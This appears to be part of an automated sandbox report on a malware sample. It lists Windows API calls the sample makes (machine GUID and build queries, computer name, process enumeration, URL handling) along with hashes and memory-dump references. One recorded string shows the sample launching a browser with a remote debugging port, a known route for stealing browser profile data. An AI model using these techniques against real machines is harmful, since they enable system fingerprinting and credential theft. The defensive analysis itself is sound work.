                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                                                                                                        • String ID: lU:\U:
                                                                                                                                                                                                                                                        • API String ID: 778332206-3948173833
                                                                                                                                                                                                                                                        • Opcode ID: bbfc04d4517978a74dd27c93567b95cb007187e19398ea8aae095dcb582b45c5
                                                                                                                                                                                                                                                        • Instruction ID: b23433032d89939c9a1c5686a1049642dde7bc222e88205bb36ef47a67ba72cc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbfc04d4517978a74dd27c93567b95cb007187e19398ea8aae095dcb582b45c5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92014871304251CFCB09CB98DD91EBA3BB1BF88340B5500A9E806EB352C660AC16CB55
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,?,?,?,?), ref: 0042DE9F
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                                                                                                        • String ID: MachineGuid
                                                                                                                                                                                                                                                        • API String ID: 3660427363-4186287252
                                                                                                                                                                                                                                                        • Opcode ID: c66cf06dad364d8bac54bedbad56f9716f0add775f9a539457f02d0de4791144
                                                                                                                                                                                                                                                        • Instruction ID: ba88c2097a3792caa789a2813ec4e7626ca2f95040182126447a6b438f43dc87
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c66cf06dad364d8bac54bedbad56f9716f0add775f9a539457f02d0de4791144
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFF06276205214AFC610DF58ED84C97B3ECEF98302F444639F688C7611E634E925CBA6
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,?,?,?,?), ref: 0042ED2E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                                                                                                        • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                        • API String ID: 3660427363-1022791448
                                                                                                                                                                                                                                                        • Opcode ID: de1cb79093b787e971b755ba4a6434ff3f329c3daa267bf7f133a1c6b94a2073
                                                                                                                                                                                                                                                        • Instruction ID: b3ce48cbf25b5b96d898ef4d4e9222a2c2e65e16991ee14dcf98a9894f916f96
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de1cb79093b787e971b755ba4a6434ff3f329c3daa267bf7f133a1c6b94a2073
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57F03676620108AFD254EB04EC98C76B7EDEB49325B084639FE49C7361D236DC16CE65
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0042E26E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Open
                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                        • API String ID: 71445658-1684325040
                                                                                                                                                                                                                                                        • Opcode ID: aa3523eac91cc744b58322a56da9ff371269731b1fb6674dbd17e779c2e49c37
                                                                                                                                                                                                                                                        • Instruction ID: c422763f6e86e012ed51617d192ff3e042baae0879a5561e5dde49c82c68daff
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa3523eac91cc744b58322a56da9ff371269731b1fb6674dbd17e779c2e49c37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37014FB6601315EFD320EF05DC40D56B7B9FFD5305F22C91AA8458B262C670D955CB91
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004172DF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandleInternet
                                                                                                                                                                                                                                                        • String ID: \U:
                                                                                                                                                                                                                                                        • API String ID: 1081599783-3520650122
                                                                                                                                                                                                                                                        • Opcode ID: ca577e094966fe71e91204a4a3c04e848e379c95ee275b5bb9559f7d086a8efc
                                                                                                                                                                                                                                                        • Instruction ID: f27c74abee2a132deee621adf8a42b6cd6049cc866ef43a8cca0a930be463f5c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca577e094966fe71e91204a4a3c04e848e379c95ee275b5bb9559f7d086a8efc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63014B7A604212CFCB04CB98ED95DAD7BB6BF8831171550B5E902E7322C630EC52CB64
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetComputerNameA.KERNEL32(00000000), ref: 0042DAF1
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                                                                                                                        • String ID: __Q
                                                                                                                                                                                                                                                        • API String ID: 3545744682-4057710983
                                                                                                                                                                                                                                                        • Opcode ID: 1cdbf7e5f1fcb410054fd1285a0f0b87ce5c6212a8b75bf3e16044b3be1c0c03
                                                                                                                                                                                                                                                        • Instruction ID: be0ca59ade7ecd798f7df36055df05fc3af05b95701f90fd905a97f074da757b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cdbf7e5f1fcb410054fd1285a0f0b87ce5c6212a8b75bf3e16044b3be1c0c03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3E06DF13012005FD314DB1CDCD0F6B36ADEB95221B0A0128F905C7352C634EC618A69
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0043B1B9
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                                                                                                        • String ID: Xy'I
                                                                                                                                                                                                                                                        • API String ID: 2029273394-2702762207
                                                                                                                                                                                                                                                        • Opcode ID: f3e83f93aabd4857b7b49c4c4aa8e0b9f655b093c567f8a7b53efdd5a3e4a469
                                                                                                                                                                                                                                                        • Instruction ID: d73b5ef48538330b038cfa5cf1699eb6f033d0b1094463736a81413be13acbcd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3e83f93aabd4857b7b49c4c4aa8e0b9f655b093c567f8a7b53efdd5a3e4a469
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3D017B0B0025A8FDB54CF64C895F6937B6AB95301F0680B8E609A32A2E636BD058F05
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00413F2F
                                                                                                                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00413F49
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1274457161-0
                                                                                                                                                                                                                                                        • Opcode ID: 9a9caeb269bd42e4b902408b913b89786a0500cdbd7b3965d966c38dac5569bb
                                                                                                                                                                                                                                                        • Instruction ID: 8ac2d0027e0228dac80c1de52e30b844887a9818d1fc82b284216c5a1affe04f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a9caeb269bd42e4b902408b913b89786a0500cdbd7b3965d966c38dac5569bb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F2136B5A452249FD741CF2CEC85A4AB7E8FF48208B040479F818C7322EB74EE558F99
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                        • String ID: --remote-debugging-port=9223 --profile-directory="
                                                                                                                                                                                                                                                        • API String ID: 2221118986-1334509734
                                                                                                                                                                                                                                                        • Opcode ID: 9a50220bff86a294718a31fd369e4dae0102c3ac23431620c094894538ed402a
                                                                                                                                                                                                                                                        • Instruction ID: 0710bbe6aa66ab725586d7924017581952b2af0891fe642baede2a91e723ed24
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a50220bff86a294718a31fd369e4dae0102c3ac23431620c094894538ed402a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC313AB6A012088FD720DF68DC81B9977E8AB88305F04056AAD45E7362EB74EE44CF95
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00401953
                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 00401967
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeapOpen
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1634843882-0
                                                                                                                                                                                                                                                        • Opcode ID: c4400e208c9cea2b76adef349ea05d37b32d96b72df845353cbd0a4d0a7a9e19
                                                                                                                                                                                                                                                        • Instruction ID: 08071b77817c831f5e477c1fb27290d1eba7258756eaedfa8cd7f4ab22aef831
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4400e208c9cea2b76adef349ea05d37b32d96b72df845353cbd0a4d0a7a9e19
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFF06D75209305AFD614DB25EC5AD1B7BA8EF8E315B014168F9009B262DAB0A800CB60
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042D718
                                                                                                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 0042D72A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2353314856-0
                                                                                                                                                                                                                                                        • Opcode ID: 21dabb9cabdede840cccac72868f6578cb47e081edb6a75b8ec9c316f91510ba
                                                                                                                                                                                                                                                        • Instruction ID: 58fc52e8d1a1c9204890e30fc30c294bf4a30385e1e5fa8a1872971ac4d05b39
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21dabb9cabdede840cccac72868f6578cb47e081edb6a75b8ec9c316f91510ba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48F06DB6200301AFD710EF14DC88F5677B9EB89709F10841DA94597792D770AC25CB61
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00431D2C
                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00660A88,00000000,00020119,?), ref: 00431D54
